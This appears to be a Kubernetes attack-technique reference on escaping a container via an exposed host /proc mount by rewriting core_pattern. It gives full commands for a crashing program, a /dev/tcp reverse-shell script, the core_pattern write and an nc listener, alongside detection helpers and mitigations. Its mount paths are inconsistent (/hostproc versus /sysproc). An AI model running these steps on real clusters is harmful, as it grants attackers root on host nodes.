Container escape via the core_pattern usermode_helper in the case of an exposed /proc mount.
| Source | Destination | MITRE ATT&CK |
|---|---|---|
| Container | Node | Escape to Host, T1611 |
/proc/sys/kernel/core_pattern controls what happens when a core file is generated (typically on a program crash). If the first character of this file is a pipe symbol (|), the rest of the line names a program to execute, and the core file is passed to that program on standard input. The program runs as the root user, and its command line can be up to 128 bytes. An attacker who controls this value gets trivial code execution on the container host: any crash that generates a core file triggers the program, and the core file itself can simply be discarded. With write access to the host /proc directory and no additional privileges, an attacker can abuse this to escape a container and gain root on the containing K8s node.
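The pipe rule described above can be checked from the defender's side. The following is a minimal sketch, not part of the original write-up: the function name check_core_pattern is hypothetical, and it only reads the file and reports whether core dumps are handed to a helper program or written using a file name template.

```shell
# Report how core dumps are handled according to a core_pattern file.
# Usage: check_core_pattern [path]   (defaults to /proc/sys/kernel/core_pattern)
# check_core_pattern is a hypothetical helper name used for illustration.
check_core_pattern() {
    pattern=$(cat "${1:-/proc/sys/kernel/core_pattern}") || return 2
    case "$pattern" in
        # A leading pipe means the rest of the line is a program run on each core dump.
        '|'*) echo "piped to helper: ${pattern#?}" ;;
        # Anything else is treated as a file name template for the core file.
        *)    echo "file template: $pattern" ;;
    esac
}
```

Calling check_core_pattern with no argument inspects the live setting. An unexpected helper path, particularly one under a container snapshot directory, is worth investigating.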
Execution within a container process with the host /proc/sys/kernel (or any parent directory) mounted inside the container.
See the example pod spec.
Determine mounted volumes within the container as per VOLUME_DISCOVER. If the host /proc/sys/kernel (or any parent directory) is mounted, this attack will be possible. Example below.
$ cat /proc/self/mounts
...
proc /hostproc proc rw,nosuid,nodev,noexec,relatime 0 0
...
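The same check can be scripted rather than read by eye. This is a rough sketch under assumptions: the function name list_extra_proc_mounts is hypothetical, and it treats any proc-type mount outside the container's own /proc tree as suspicious, printing the mount point and whether it is mounted rw or ro.

```shell
# List proc filesystems mounted outside the container's own /proc tree.
# Usage: list_extra_proc_mounts [mounts-file]   (defaults to /proc/self/mounts)
# list_extra_proc_mounts is a hypothetical helper name used for illustration.
list_extra_proc_mounts() {
    awk '$3 == "proc" && $2 != "/proc" && index($2, "/proc/") != 1 {
        # Field 4 holds the mount options; the first one is rw or ro.
        split($4, opts, ",")
        print $2, opts[1]
    }' "${1:-/proc/self/mounts}"
}
```

For the sample output above, this prints `/hostproc rw`. Mounts under /proc itself (such as the read-only masks that container runtimes commonly add) are skipped on purpose.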
First find the path of the container's filesystem on the host. This can be done by retrieving the current mounts (see VOLUME_DISCOVER). Look for the upperdir value of the overlayfs entry associated with containerd:
$ cat /etc/mtab # or `cat /proc/mounts` depending on the system
...
overlay / overlay rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/27/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/71/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/71/work 0 0
...
# Store path in a variable for future use
$ OVERLAY_PATH=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/71/fs
Oneliner alternative:
export OVERLAY_PATH=$(cat /proc/mounts | grep -oe upperdir="[^,]*," | cut -d = -f 2 | tr -d , | head -n 1)
Next create a small program that crashes immediately and generates a core dump. For example:
echo 'int main(void) {
char buf[1];
for (int i = 0; i < 100; i++) {
buf[i] = 1;
}
return 0;
}' > /tmp/crash.c
Compile the program and copy the binary into the container as crash:
apt update && apt install gcc
gcc -o crash /tmp/crash.c
Next write a shell script to be triggered inside the container's file system as shell.sh:
# Reverse shell
# Note: /dev/tcp redirection is a bash feature, so the host's sh must support it
REVERSE_IP=$(hostname -I | tr -d " ") && \
echo '#!/bin/sh' > /tmp/shell.sh && \
echo "sh -i >& /dev/tcp/${REVERSE_IP}/9000 0>&1" >> /tmp/shell.sh && \
chmod a+x /tmp/shell.sh
Finally write the usermode_helper script path to the core_pattern helper path and trigger the container escape:
# move to mounted folder with /proc
cd /sysproc
echo "|$OVERLAY_PATH/tmp/shell.sh" > core_pattern
cd
apt install netcat-traditional
sleep 5 && ./crash & nc -l -vv -p 9000
- Use the Datadog agent to monitor for creation of new usermode_helper programs via writes to known locations, in this case /proc/sys/kernel/core_pattern.
Use a pod security policy or admission controller to prevent or limit the creation of pods with a hostPath mount of /proc or other sensitive locations.
Avoid running containers as the root user. Enforce running as an unprivileged user account using the runAsNonRoot setting inside securityContext (or by explicitly setting runAsUser to an unprivileged user). Additionally, ensure that allowPrivilegeEscalation: false is set in securityContext so that a container running as an unprivileged user cannot escalate to the root user.
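As an illustration of the settings named above, a pod spec fragment might look like the following. This is only a sketch: the pod name, container name, image, and UID are placeholders, and only the three securityContext fields come from the text.

```yaml
# Hypothetical pod; only the securityContext fields are taken from the guidance above.
apiVersion: v1
kind: Pod
metadata:
  name: example-unprivileged              # placeholder name
spec:
  containers:
    - name: app                           # placeholder name
      image: registry.example.com/app:1.0 # placeholder image
      securityContext:
        runAsNonRoot: true                # refuse to start if the image would run as UID 0
        runAsUser: 1000                   # arbitrary non-zero UID chosen for illustration
        allowPrivilegeEscalation: false   # block setuid-style escalation to root
```

These settings reduce the impact of an exposed mount but do not replace the admission-time restriction on hostPath mounts of /proc.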